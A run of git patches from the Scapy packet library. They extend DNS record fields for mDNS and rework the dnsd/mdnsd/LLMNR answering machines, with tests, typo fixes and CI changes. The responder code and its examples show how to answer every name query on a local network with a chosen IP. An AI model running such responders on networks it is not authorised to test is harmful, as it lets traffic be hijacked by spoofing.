ShortField("keytag", 0), @@ -889,7 +927,8 @@ class DNSRRNSEC3(_DNSRRdummy): name = "DNS NSEC3 Resource Record" fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 50, dnstypes), - ShortEnumField("rclass", 1, dnsclasses), + BitField("cacheflush", 0, 1), # mDNS RFC 6762 + BitEnumField("rclass", 1, 15, dnsclasses), IntField("ttl", 0), ShortField("rdlen", None), ByteField("hashalg", 0), @@ -899,7 +938,7 @@ class DNSRRNSEC3(_DNSRRdummy): StrLenField("salt", "", length_from=lambda x: x.saltlength), FieldLenField("hashlength", 0, fmt="!B", length_of="nexthashedownername"), # noqa: E501 StrLenField("nexthashedownername", "", length_from=lambda x: x.hashlength), # noqa: E501 - RRlistField("typebitmaps", "") + RRlistField("typebitmaps", []) ] @@ -907,7 +946,8 @@ class DNSRRNSEC3PARAM(_DNSRRdummy): name = "DNS NSEC3PARAM Resource Record" fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 51, dnstypes), - ShortEnumField("rclass", 1, dnsclasses), + BitField("cacheflush", 0, 1), # mDNS RFC 6762 + BitEnumField("rclass", 1, 15, dnsclasses), IntField("ttl", 0), ShortField("rdlen", None), ByteField("hashalg", 0), @@ -976,7 +1016,8 @@ class DNSRRSVCB(_DNSRRdummy): name = "DNS SVCB Resource Record" fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 64, dnstypes), - ShortEnumField("rclass", 1, dnsclasses), + BitField("cacheflush", 0, 1), # mDNS RFC 6762 + BitEnumField("rclass", 1, 15, dnsclasses), IntField("ttl", 0), ShortField("rdlen", None), ShortField("svc_priority", 0), @@ -998,7 +1039,8 @@ class DNSRRSRV(_DNSRRdummy): name = "DNS SRV Resource Record" fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 33, dnstypes), - ShortEnumField("rclass", 1, dnsclasses), + BitField("cacheflush", 0, 1), # mDNS RFC 6762 + BitEnumField("rclass", 1, 15, dnsclasses), IntField("ttl", 0), ShortField("rdlen", None), ShortField("priority", 0), @@ -1093,7 +1135,8 @@ class DNSRR(Packet): show_indent = 0 fields_desc = [DNSStrField("rrname", ""), ShortEnumField("type", 1, dnstypes), - ShortEnumField("rclass", 1, dnsclasses), + BitField("cacheflush", 0, 1), # mDNS RFC 6762 + BitEnumField("rclass", 1, 15, dnsclasses), IntField("ttl", 0), FieldLenField("rdlen", None, length_of="rdata", fmt="H"), MultipleTypeField( @@ -1150,7 +1193,8 @@ class DNSQR(Packet): show_indent = 0 fields_desc = [DNSStrField("qname", "www.example.com"), ShortEnumField("qtype", 1, dnsqtypes), - ShortEnumField("qclass", 1, dnsclasses)] + BitField("unicastresponse", 0, 1), # mDNS RFC 6762 + BitEnumField("qclass", 1, 15, dnsclasses)] def default_payload_class(self, payload): return conf.padding_layer @@ -1432,45 +1476,105 @@ def parse_options(self, joker=None, joker6=False, send_error=False, relay=False, - from_ip=None, - from_ip6=None, + from_ip=True, + from_ip6=False, src_ip=None, src_ip6=None, ttl=10, - jokerarpa=None): + jokerarpa=False): """ - :param joker: default IPv4 for unresolved domains. (Default: None) + Simple DNS answering machine. + + :param joker: default IPv4 for unresolved domains. Set to False to disable, None to mirror the interface's IP. - :param joker6: default IPv6 for unresolved domains (Default: False) - set to False to disable, None to mirror the interface's IPv6. - :param jokerarpa: answer for .in-addr.arpa PTR requests. (Default: None) + Defaults to None, unless 'match' is used, then it defaults to + False. + :param joker6: default IPv6 for unresolved domains. + Set to False to disable, None to mirror the interface's IPv6. + Defaults to False. + :param match: queries to match. + This can be a dictionary of {name: val} where name is a string + representing a domain name (A, AAAA) and val is a tuple of 2 + elements, each representing an IP or a list of IPs. If val is + a single element, (A, None) is assumed. + This can also be a list or names, in which case joker(6) are + used as a response. + :param jokerarpa: answer for .in-addr.arpa PTR requests. (Default: False) :param relay: relay unresolved domains to conf.nameservers (Default: False). :param send_error: send an error message when this server can't answer (Default: False) - :param match: a dictionary of {name: val} where name is a string representing - a domain name (A, AAAA) and val is a tuple of 2 elements, each - representing an IP or a list of IPs. If val is a single element, - (A, None) is assumed. :param srvmatch: a dictionary of {name: (port, target)} used for SRV - :param from_ip: an source IP to filter. Can contain a netmask - :param from_ip6: an source IPv6 to filter. Can contain a netmask + :param from_ip: an source IP to filter. Can contain a netmask. True for all, + False for none. Default True + :param from_ip6: an source IPv6 to filter. Can contain a netmask. True for all, + False for none. Default False :param ttl: the DNS time to live (in seconds) :param src_ip: override the source IP :param src_ip6: - Example:: + Examples: + + - Answer all 'A' and 'AAAA' requests:: $ sudo iptables -I OUTPUT -p icmp --icmp-type 3/3 -j DROP - >>> dnsd(match={"google.com": "1.1.1.1"}, joker="192.168.0.2", iface="eth0") - >>> dnsd(srvmatch={ - ... "_ldap._tcp.dc._msdcs.DOMAIN.LOCAL.": (389, "srv1.domain.local") - ... }) + >>> dnsd(joker="192.168.0.2", joker6="fe80::260:8ff:fe52:f9d8", + ... iface="eth0") + + - Answer only 'A' query for google.com with 192.168.0.2:: + + >>> dnsd(match={"google.com": "192.168.0.2"}, iface="eth0") + + - Answer DNS for a Windows domain controller ('SRV', 'A' and 'AAAA'):: + + >>> dnsd( + ... srvmatch={ + ... "_ldap._tcp.dc._msdcs.DOMAIN.LOCAL.": (389, + ... "srv1.domain.local"), + ... }, + ... match={"src1.domain.local": ("192.168.0.102", + ... "fe80::260:8ff:fe52:f9d8")}, + ... ) + + - Relay all queries to another DNS server, except some:: + + >>> conf.nameservers = ["1.1.1.1"] # server to relay to + >>> dnsd( + ... match={"test.com": "1.1.1.1"}, + ... relay=True, + ... ) """ + from scapy.layers.inet6 import Net6 + + self.mDNS = isinstance(self, mDNS_am) + self.llmnr = self.cls != DNS + + # Add some checks (to help) + if not isinstance(joker, (str, bool)) and joker is not None: + raise ValueError("Bad 'joker': should be an IPv4 (str) or False !") + if not isinstance(joker6, (str, bool)) and joker6 is not None: + raise ValueError("Bad 'joker6': should be an IPv6 (str) or False !") + if not isinstance(jokerarpa, (str, bool)): + raise ValueError("Bad 'jokerarpa': should be a hostname or False !") + if not isinstance(from_ip, (str, Net, bool)): + raise ValueError("Bad 'from_ip': should be an IPv4 (str), Net or False !") + if not isinstance(from_ip6, (str, Net6, bool)): + raise ValueError("Bad 'from_ip6': should be an IPv6 (str), Net or False !") + if self.mDNS and src_ip: + raise ValueError("Cannot use 'src_ip' in mDNS !") + if self.mDNS and src_ip6: + raise ValueError("Cannot use 'src_ip6' in mDNS !") + + if joker is None and match is not None: + joker = False + self.joker = joker + self.joker6 = joker6 + self.jokerarpa = jokerarpa + def normv(v): if isinstance(v, (tuple, list)) and len(v) == 2: - return v + return tuple(v) elif isinstance(v, str): - return (v, None) + return (v, joker6) else: raise ValueError("Bad match value: '%s'" % repr(v)) @@ -1479,17 +1583,18 @@ def normk(k): if not k.endswith(b"."): k += b"." return k - if match is None: - self.match = {} - else: - self.match = {normk(k): normv(v) for k, v in match.items()} + + self.match = collections.defaultdict(lambda: (joker, joker6)) + if match: + if isinstance(match, (list, set)): + self.match.update({normk(k): (None, None) for k in match}) + else: + self.match.update({normk(k): normv(v) for k, v in match.items()}) if srvmatch is None: self.srvmatch = {} else: self.srvmatch = {normk(k): normv(v) for k, v in srvmatch.items()} - self.joker = joker - self.joker6 = joker6 - self.jokerarpa = jokerarpa + self.send_error = send_error self.relay = relay if isinstance(from_ip, str): @@ -1497,7 +1602,7 @@ def normk(k): else: self.from_ip = from_ip if isinstance(from_ip6, str): - self.from_ip6 = Net(from_ip6) + self.from_ip6 = Net6(from_ip6) else: self.from_ip6 = from_ip6 self.src_ip = src_ip @@ -1510,24 +1615,24 @@ def is_request(self, req): req.haslayer(self.cls) and req.getlayer(self.cls).qr == 0 and ( ( - not self.from_ip6 or req[IPv6].src in self.from_ip6 + self.from_ip6 is True or + (self.from_ip6 and req[IPv6].src in self.from_ip6) ) if IPv6 in req else ( - not self.from_ip or req[IP].src in self.from_ip + self.from_ip is True or + (self.from_ip and req[IP].src in self.from_ip) ) ) ) def make_reply(self, req): - mDNS = isinstance(self, mDNS_am) - llmnr = self.cls != DNS # Build reply from the request resp = req.copy() if Ether in req: - if mDNS: + if self.mDNS: resp[Ether].src, resp[Ether].dst = None, None - elif llmnr: + elif self.llmnr: resp[Ether].src, resp[Ether].dst = None, req[Ether].src else: resp[Ether].src, resp[Ether].dst = ( @@ -1537,20 +1642,30 @@ def make_reply(self, req): from scapy.layers.inet6 import IPv6 if IPv6 in req: resp[IPv6].underlayer.remove_payload() - if mDNS: - resp /= IPv6(dst="ff02::fb", src=self.src_ip6) - elif llmnr: - resp /= IPv6(dst=req[IPv6].src, src=self.src_ip6) + if self.mDNS: + # "All Multicast DNS responses (including responses sent via unicast) + # SHOULD be sent with IP TTL set to 255." + resp /= IPv6(dst="ff02::fb", src=self.src_ip6, + fl=req[IPv6].fl, hlim=255) + elif self.llmnr: + resp /= IPv6(dst=req[IPv6].src, src=self.src_ip6, + fl=req[IPv6].fl, hlim=req[IPv6].hlim) else: - resp /= IPv6(dst=req[IPv6].src, src=self.src_ip6 or req[IPv6].dst) + resp /= IPv6(dst=req[IPv6].src, src=self.src_ip6 or req[IPv6].dst, + fl=req[IPv6].fl, hlim=req[IPv6].hlim) elif IP in req: resp[IP].underlayer.remove_payload() - if mDNS: - resp /= IP(dst="224.0.0.251", src=self.src_ip) - elif llmnr: - resp /= IP(dst=req[IP].src, src=self.src_ip) + if self.mDNS: + # "All Multicast DNS responses (including responses sent via unicast) + # SHOULD be sent with IP TTL set to 255." + resp /= IP(dst="224.0.0.251", src=self.src_ip, + id=req[IP].id, ttl=255) + elif self.llmnr: + resp /= IP(dst=req[IP].src, src=self.src_ip, + id=req[IP].id, ttl=req[IP].ttl) else: - resp /= IP(dst=req[IP].src, src=self.src_ip or req[IP].dst) + resp /= IP(dst=req[IP].src, src=self.src_ip or req[IP].dst, + id=req[IP].id, ttl=req[IP].ttl) else: warning("No IP or IPv6 layer in %s", req.command()) return @@ -1559,8 +1674,6 @@ def make_reply(self, req): except IndexError: warning("No UDP layer in %s", req.command(), exc_info=True) return - # Now process each query and store its answer in 'ans' - ans = [] try: req = req[self.cls] except IndexError: @@ -1576,48 +1689,84 @@ def make_reply(self, req): except AttributeError: warning("No qd attribute in %s", req.command(), exc_info=True) return + # Special case: alias 'ALL' query as 'A' + 'AAAA' + try: + allquery = next( + (x for x in queries if getattr(x, "qtype", None) == 255) + ) + queries.remove(allquery) + queries.extend([ + DNSQR( + qtype=x, + qname=allquery.qname, + unicastresponse=allquery.unicastresponse, + qclass=allquery.qclass, + ) + for x in [1, 28] + ]) + except StopIteration: + pass + # Process each query + ans = [] + ars = [] for rq in queries: - # For each query if isinstance(rq, Raw): warning("Cannot parse qd element %s", rq.command(), exc_info=True) continue + rqname = rq.qname.lower() if rq.qtype in [1, 28]: # A or AAAA if rq.qtype == 28: # AAAA - try: - rdata = self.match[rq.qname.lower()][1] - except KeyError: - if self.relay or self.joker6 is False: - rdata = None + rdata = self.match[rqname][1] + if rdata is None and not self.relay: + # 'None' resolves to the default IPv6 + iface = resolve_iface(self.optsniff.get("iface", conf.iface)) + if self.mDNS: + # All IPs, as per mDNS. + rdata = iface.ips[6] else: - rdata = self.joker6 or get_if_addr6( - self.optsniff.get("iface", conf.iface) + rdata = get_if_addr6( + iface ) + if self.mDNS and rdata and IPv6 in resp: + # For mDNS, we must replace the IPv6 src + resp[IPv6].src = rdata elif rq.qtype == 1: # A - try: - rdata = self.match[rq.qname.lower()][0] - except KeyError: - if self.relay or self.joker is False: - rdata = None + rdata = self.match[rqname][0] + if rdata is None and not self.relay: + # 'None' resolves to the default IPv4 + iface = resolve_iface(self.optsniff.get("iface", conf.iface)) + if self.mDNS: + # All IPs, as per mDNS. + rdata = iface.ips[4] else: - rdata = self.joker or get_if_addr( - self.optsniff.get("iface", conf.iface) + rdata = get_if_addr( + iface ) - if rdata is not None: + if self.mDNS and rdata and IP in resp: + # For mDNS, we must replace the IP src + resp[IP].src = rdata + if rdata: # Common A and AAAA if not isinstance(rdata, list): rdata = [rdata] ans.extend([ - DNSRR(rrname=rq.qname, ttl=self.ttl, rdata=x, type=rq.qtype) + DNSRR( + rrname=rq.qname, + ttl=self.ttl, + rdata=x, + type=rq.qtype, + cacheflush=self.mDNS and rq.qtype == rq.qtype, + ) for x in rdata ]) continue # next elif rq.qtype == 33: # SRV try: - port, target = self.srvmatch[rq.qname.lower()] + port, target = self.srvmatch[rqname] ans.append(DNSRRSRV( rrname=rq.qname, port=port, @@ -1649,23 +1798,52 @@ def make_reply(self, req): continue # next except TimeoutError: pass - # Error - break + # Still no answer. + if self.mDNS: + # "Any time a responder receives a query for a name for which it + # has verified exclusive ownership, for a type for which that name + # has no records, the responder MUST respond asserting the + # nonexistence of that record using a DNS NSEC record [RFC4034]." + ans.append(DNSRRNSEC( + # RFC6762 sect 6.1 - Negative Response + ttl=self.ttl, + rrname=rq.qname, + nextname=rq.qname, + typebitmaps=RRlist2bitmap([rq.qtype]), + )) + if self.mDNS and all(x.type == 47 for x in ans): + # If mDNS answers with only NSEC, discard. + return + if not ans: + # No answer is available. + if self.send_error: + resp /= self.cls(id=req.id, qr=1, qd=req.qd, rcode=3) + return resp + log_runtime.info("No answer could be provided to: %s" % req.summary()) + return + # Handle Additional Records + if self.mDNS: + # Windows specific extension + ars.append(DNSRROPT( + z=0x1194, + rdata=[ + EDNS0OWN( + primary_mac=resp[Ether].src, + ), + ], + )) + # All rq were answered + if self.mDNS: + # in mDNS mode, don't repeat the question, set aa=1, rd=0 + dns = self.cls(id=req.id, aa=1, rd=0, qr=1, qd=[], ar=ars, an=ans) else: - if not ans: - # No rq was actually answered, as none was valid. Discard. - return - # All rq were answered - if mDNS: - # in mDNS mode, don't repeat the question - resp /= self.cls(id=req.id, qr=1, qd=[], an=ans) - else: - resp /= self.cls(id=req.id, qr=1, qd=req.qd, an=ans) - return resp - # An error happened - if self.send_error: - resp /= self.cls(id=req.id, qr=1, qd=req.qd, rcode=3) - return resp + dns = self.cls(id=req.id, qr=1, qd=req.qd, ar=ars, an=ans) + # Compress DNS and mDNS + if not self.llmnr: + resp /= dns_compress(dns) + else: + resp /= dns + return resp class mDNS_am(DNS_am): @@ -1676,8 +1854,24 @@ class mDNS_am(DNS_am): Example:: - >>> mdnsd(joker="192.168.0.2", iface="eth0") - >>> mdnsd(match={"TEST.local": "192.168.0.2"}) + - Answer for 'TEST.local' with local IPv4:: + + >>> mdnsd(match=["TEST.local"]) + + - Answer all requests with other IP:: + + >>> mdnsd(joker="192.168.0.2", joker6="fe80::260:8ff:fe52:f9d8", + ... iface="eth0") + + - Answer for multiple different mDNS names:: + + >>> mdnsd(match={"TEST.local": "192.168.0.100", + ... "BOB.local": "192.168.0.101"}) + + - Answer with both A and AAAA records:: + + >>> mdnsd(match={"TEST.local": ("192.168.0.100", + ... "fe80::260:8ff:fe52:f9d8")}) """ function_name = "mdnsd" filter = "udp port 5353" diff --git a/test/answering_machines.uts b/test/answering_machines.uts index 2434765b05d..a9a8517acd9 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -138,19 +138,22 @@ def check_LLMNR_am_am_reply(packet): assert packet[LLMNRResponse].qd[0].qname == b"TEST." assert packet[LLMNRResponse].an[0].rdata == "192.168.1.1" assert packet[LLMNRResponse].an[0].rrname == b"TEST." - assert packet[LLMNRResponse].an[0].ttl == 10 + assert packet[LLMNRResponse].an[0].ttl == 60 test_am(LLMNR_am, Ether(src="aa:aa:aa:aa:aa:aa", dst="01:00:5e:00:00:fc")/IP(src="192.168.0.1", dst="224.0.0.252")/UDP(dport=5355, sport=51938)/LLMNRQuery(qd=DNSQR(qname=b"TEST.", qtype="A")), check_LLMNR_am_am_reply, + ttl=60, match={"TEST": "192.168.1.1"}) = mDNS_am def check_mDNS_am_reply(packet): - assert packet[Ether].src == get_if_hwaddr(conf.iface) + packet.show() + # assert packet[Ether].src == get_if_hwaddr(conf.iface) assert packet[Ether].dst == "01:00:5e:00:00:fb" - assert packet[IP].src == get_if_addr(conf.iface) + # assert packet[IP].src == get_if_addr(conf.iface) assert packet[IP].dst == "224.0.0.251" + assert packet[IP].ttl == 255 assert packet[UDP].dport == 5353 assert packet[UDP].sport == 5353 assert DNS in packet and packet[DNS].ancount == 1 and packet[DNS].qdcount == 0 @@ -159,10 +162,35 @@ def check_mDNS_am_reply(packet): assert packet[DNS].an[0].ttl == 10 test_am(mDNS_am, - Ether(src="aa:aa:aa:aa:aa:aa", dst="01:00:5e:00:00:fb")/IP(src="192.168.0.1", dst="224.0.0.251")/UDP(dport=5353, sport=5353)/DNS(qd=DNSQR(qname=b"TEST.local.", qtype="A")), + Ether(src="aa:aa:aa:aa:aa:aa", dst="01:00:5e:00:00:fb")/IP(src="192.168.0.1", dst="224.0.0.251", ttl=1)/UDP(dport=5353, sport=5353)/DNS(qd=DNSQR(qname=b"TEST.local.", qtype="A")), check_mDNS_am_reply, joker="192.168.1.1") + +def check_mDNS_am_reply2(packet): + # $ avahi-resolve -n bonjour.local + packet.show() + # assert packet[Ether].src == get_if_hwaddr(conf.iface) + assert packet[Ether].dst == "01:00:5e:00:00:fb" + # assert packet[IP].src == get_if_addr(conf.iface) + assert packet[IP].dst == "224.0.0.251" + assert packet[IP].ttl == 255 + assert packet[UDP].dport == 5353 + assert packet[UDP].sport == 5353 + assert DNS in packet and packet[DNS].ancount == 2 and packet[DNS].qdcount == 0 + assert packet[DNS].an[0].rdata == "192.168.1.1" + assert packet[DNS].an[0].rrname == b"bonjour.local." + assert packet[DNS].an[0].ttl == 120 + assert packet[DNS].an[1].type == 47 + assert packet[DNS].an[1].rrname == b"bonjour.local." + assert packet[DNS].an[1].ttl == 120 + +test_am(mDNS_am, + Ether(b'\x01\x00^\x00\x00\xfb\xaa\xaa\xaa\xaa\xaa\xaa\x08\x00E\x00\x00A\xce}@\x00\xff\x11\x0b\x89\xc0\xa8\x00\x01\xe0\x00\x00\xfb\x14\xe9\x14\xe9\x00-\xdbl\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x07bonjour\x05local\x00\x00\x01\x00\x01\xc0\x0c\x00\x1c\x00\x01'), + check_mDNS_am_reply2, + joker="192.168.1.1", + ttl=120) + = DHCPv6_am - Basic Instantiaion ~ osx netaccess a = DHCPv6_am() diff --git a/test/regression.uts b/test/regression.uts index 9ac35f5b953..0f36e4d61ce 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1484,7 +1484,7 @@ assert pkt.command() == "DNS(qd=[DNSQR(qname=b'google.com.', qtype=1)])" = Test json() with nested packet -assert pkt.json() == '{"length": null, "id": 0, "qr": 0, "opcode": 0, "aa": 0, "tc": 0, "rd": 1, "ra": 0, "z": 0, "ad": 0, "cd": 0, "rcode": 0, "qdcount": null, "ancount": null, "nscount": null, "arcount": null, "qd": [{"qname": "google.com.", "qtype": 1, "qclass": 1}]}' +assert pkt.json() == '{"length": null, "id": 0, "qr": 0, "opcode": 0, "aa": 0, "tc": 0, "rd": 1, "ra": 0, "z": 0, "ad": 0, "cd": 0, "rcode": 0, "qdcount": null, "ancount": null, "nscount": null, "arcount": null, "qd": [{"qname": "google.com.", "qtype": 1, "unicastresponse": 0, "qclass": 1}]}' = Test command() with ASN.1 packet diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index c4d0ab93b4d..e2912ac4943 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -124,8 +124,8 @@ pkt = DNS(qr=1, qd=[], aa=1, rd=1) pkt.an = [ DNSRR(type=12, rrname='_raop._tcp.local.', rdata='140C768FFE28@Freebox Server._raop._tcp.local.'), DNSRR(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', type=16, rdata=[b'txtvers=1', b'vs=190.9', b'ch=2', b'sr=44100', b'ss=16', b'pw=false', b'et=0,1', b'ek=1', b'tp=TCP,UDP', b'am=FreeboxServer1,2', b'cn=0,1,2,3', b'md=0,2', b'sf=0x44', b'ft=0xBF0A00', b'sv=false', b'da=true', b'vn=65537', b'vv=2']), - DNSRRSRV(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', target='Freebox-Server-3.local.', port=5000, type=33, rclass=32769), - DNSRR(rrname='Freebox-Server-3.local.', rdata='192.168.0.254', rclass=32769, type=1, ttl=120), + DNSRRSRV(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', target='Freebox-Server-3.local.', port=5000, type=33, cacheflush=1, rclass=1), + DNSRR(rrname='Freebox-Server-3.local.', rdata='192.168.0.254', cacheflush=1, rclass=1, type=1, ttl=120), ] pkt = DNS(raw(pkt)) From 0425a46f74f898a83336fce1b410f29b2912fb39 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 26 May 2024 22:41:25 +0200 Subject: [PATCH 1286/1632] Fix the newest codespell update (#4400) --- .config/codespell_ignore.txt | 1 + scapy/config.py | 2 +- scapy/contrib/gtp.py | 2 +- scapy/layers/sixlowpan.py | 2 +- scapy/layers/tls/handshake.py | 2 +- test/scapy/layers/smb2.uts | 4 ++-- 6 files changed, 7 insertions(+), 6 deletions(-) diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index a057b8e5b26..cfdb00d50f8 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -23,6 +23,7 @@ iff implementors inout interaktive +joinin merchantibility microsof mitre diff --git a/scapy/config.py b/scapy/config.py index 1f75e94e207..3fe04388617 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -1111,7 +1111,7 @@ class Conf(ConfClass): #: When TCPSession is used, parse DCE/RPC sessions automatically. #: This should be used for passive sniffing. dcerpc_session_enable = False - #: If a capture is missing the first DCE/RPC bindin message, we might incorrectly + #: If a capture is missing the first DCE/RPC binding message, we might incorrectly #: assume that header signing isn't used. This forces it on. dcerpc_force_header_signing = False #: Windows SSPs for sniffing. This is used with diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 1c12e8cf37b..66a911b69fa 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -861,7 +861,7 @@ class IE_EvolvedAllocationRetentionPriority(IE_Base): class IE_CharginGatewayAddress(IE_Base): - name = "Chargin Gateway Address" + name = "Charging Gateway Address" fields_desc = [ByteEnumField("ietype", 251, IEType), ShortField("length", 4), ConditionalField(IPField("ipv4_address", "127.0.0.1"), diff --git a/scapy/layers/sixlowpan.py b/scapy/layers/sixlowpan.py index fd6247715ce..22bf979cf87 100644 --- a/scapy/layers/sixlowpan.py +++ b/scapy/layers/sixlowpan.py @@ -1095,7 +1095,7 @@ class SixLoWPAN(Packet): @classmethod def dispatch_hook(cls, _pkt=b"", *args, **kargs): - """Depending on the payload content, the frame type we should interpretate""" # noqa: E501 + """Depending on the payload content, the frame type we should interpret""" if _pkt and len(_pkt) >= 1: fb = ord(_pkt[:1]) if fb == 0x41: diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index f767c15d449..d60fdb2ffbc 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -404,7 +404,7 @@ def post_build(self, p, pay): # For a resumed PSK, the hash function use # to compute the binder must be the same # as the one used to establish the original - # conntection. For that, we assume that + # connection. For that, we assume that # the ciphersuite associate with the ticket # is given as argument to tlsSession # (see layers/tls/automaton_cli.py for an diff --git a/test/scapy/layers/smb2.uts b/test/scapy/layers/smb2.uts index 80fe34e237a..f15db4edd6f 100644 --- a/test/scapy/layers/smb2.uts +++ b/test/scapy/layers/smb2.uts @@ -52,7 +52,7 @@ assert pkt[NBTSession].TYPE == 0x00 # session message smb2 = pkt[SMB2_Header] assert smb2.Start == b'\xfeSMB' -+ SMB2 Negotiate Procotol Request Header dissecting ++ SMB2 Negotiate Protocol Request Header dissecting = Common fields in header @@ -209,7 +209,7 @@ pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negotiate_Protocol_Resp pkt = IP(raw(pkt)) assert SMB2_Negotiate_Protocol_Response in pkt -+ SMB2 Negotiate Procotol Request Header with 1 dialect ++ SMB2 Negotiate Protocol Request Header with 1 dialect = Common fields in header From b0506a1e22321eba41d5c21d26bba418de04bc8f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 27 May 2024 01:31:52 +0200 Subject: [PATCH 1287/1632] Update zipapp.sh --- .config/ci/zipapp.sh | 3 +++ 1 file changed, 3 insertions(+) mode change 100644 => 100755 .config/ci/zipapp.sh diff --git a/.config/ci/zipapp.sh b/.config/ci/zipapp.sh old mode 100644 new mode 100755 index 525facf396c..af7b8018622 --- a/.config/ci/zipapp.sh +++ b/.config/ci/zipapp.sh @@ -69,6 +69,9 @@ if [ ! -d "./dist" ]; then mkdir dist fi +# Copy version +echo "$SCPY_VERSION" > "./dist/version" + echo "$SCPY" # Build the zipapp echo "Building zipapp" From 892b73845a647ca0e72f3ff729a0d42510e7dbef Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 28 May 2024 10:00:16 +0200 Subject: [PATCH 1288/1632] Specify the list of constants to be imported (#4403) --- scapy/consts.py | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/scapy/consts.py b/scapy/consts.py index ecff481ed29..ed8ce90c723 100644 --- a/scapy/consts.py +++ b/scapy/consts.py @@ -10,6 +10,20 @@ from sys import byteorder, platform, maxsize import platform as platform_lib +__all__ = [ + "LINUX", + "OPENBSD", + "FREEBSD", + "NETBSD", + "DARWIN", + "SOLARIS", + "WINDOWS", + "WINDOWS_XP", + "BSD", + "IS_64BITS", + "BIG_ENDIAN", +] + LINUX = platform.startswith("linux") OPENBSD = platform.startswith("openbsd") FREEBSD = "freebsd" in platform From 640252ec9e8cb887b1b41a4c9f2e37124fc53fa5 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 30 May 2024 00:08:25 +0200 Subject: [PATCH 1289/1632] Test on MacOS 14 --- .github/workflows/unittests.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index b8e56968f39..d65fe73b615 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -101,7 +101,7 @@ jobs: installmode: 'libpcap' flags: " -K scanner" # macOS tests - - os: macos-12 + - os: macos-14 python: "3.12" mode: both flags: " -K scanner" @@ -116,7 +116,7 @@ jobs: mode: root allow-failure: 'true' flags: " -k scanner" - - os: macos-12 + - os: macos-14 python: "3.12" mode: both allow-failure: 'true' From db960f2b5afccab5f7c893959e313c66972d23a5 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 4 Jun 2024 10:28:29 +0200 Subject: [PATCH 1290/1632] libpcap: make L3socket send() follow routing (#4398) This makes the L3pcapSocket behave similarly to the other L3*Socket(s). In a L3 socket, the destination is used to chose the interface to send the packet on. This means that Scapy should be able to created another pcap file descriptor if the currently bound one isn't on the proper interface. --- scapy/arch/libpcap.py | 70 +++++++++++++++++++++++++++------- scapy/arch/windows/__init__.py | 4 +- scapy/libs/winpcapy.py | 6 +++ 3 files changed, 64 insertions(+), 16 deletions(-) diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 81726b624b1..4d51709cb07 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -286,18 +286,24 @@ def __init__(self, ) self.dtl = -1 if monitor: - if WINDOWS and not conf.use_npcap: - raise OSError("On Windows, this feature requires NPcap !") - # Npcap-only functions - from scapy.libs.winpcapy import pcap_create, \ - pcap_set_snaplen, pcap_set_promisc, \ - pcap_set_timeout, pcap_set_rfmon, pcap_activate, \ - pcap_statustostr, pcap_geterr + from scapy.libs.winpcapy import pcap_create self.pcap = pcap_create(self.iface, self.errbuf) if not self.pcap: error = decode_locale_str(bytearray(self.errbuf).strip(b"\x00")) if error: raise OSError(error) + if WINDOWS and not conf.use_npcap: + raise OSError("On Windows, this feature requires NPcap !") + # Non-winpcap functions + from scapy.libs.winpcapy import ( + pcap_set_snaplen, + pcap_set_promisc, + pcap_set_timeout, + pcap_set_rfmon, + pcap_activate, + pcap_statustostr, + pcap_geterr, + ) pcap_set_snaplen(self.pcap, snaplen) pcap_set_promisc(self.pcap, promisc) pcap_set_timeout(self.pcap, to_ms) @@ -486,9 +492,13 @@ def __init__(self, self.promisc = promisc else: self.promisc = conf.sniff_promisc + self.monitor = monitor fd = open_pcap( - iface, MTU, self.promisc, 100, - monitor=monitor + device=iface, + snaplen=MTU, + promisc=self.promisc, + to_ms=100, + monitor=self.monitor, ) super(L2pcapListenSocket, self).__init__(fd) try: @@ -534,8 +544,14 @@ def __init__(self, self.promisc = promisc else: self.promisc = conf.sniff_promisc - fd = open_pcap(iface, MTU, self.promisc, 100, - monitor=monitor) + self.monitor = monitor + fd = open_pcap( + device=iface, + snaplen=MTU, + promisc=self.promisc, + to_ms=100, + monitor=self.monitor, + ) super(L2pcapSocket, self).__init__(fd) try: if not WINDOWS: @@ -579,6 +595,11 @@ def send(self, x): class L3pcapSocket(L2pcapSocket): desc = "read/write packets at layer 3 using only libpcap" + def __init__(self, *args, **kwargs): + # type: (*Any, **Any) -> None + super(L3pcapSocket, self).__init__(*args, **kwargs) + self.send_pcap_fds = {network_name(self.iface): self.pcap_fd} + def recv(self, x=MTU, **kwargs): # type: (int, **Any) -> Optional[Packet] r = L2pcapSocket.recv(self, x, **kwargs) @@ -589,11 +610,32 @@ def recv(self, x=MTU, **kwargs): def send(self, x): # 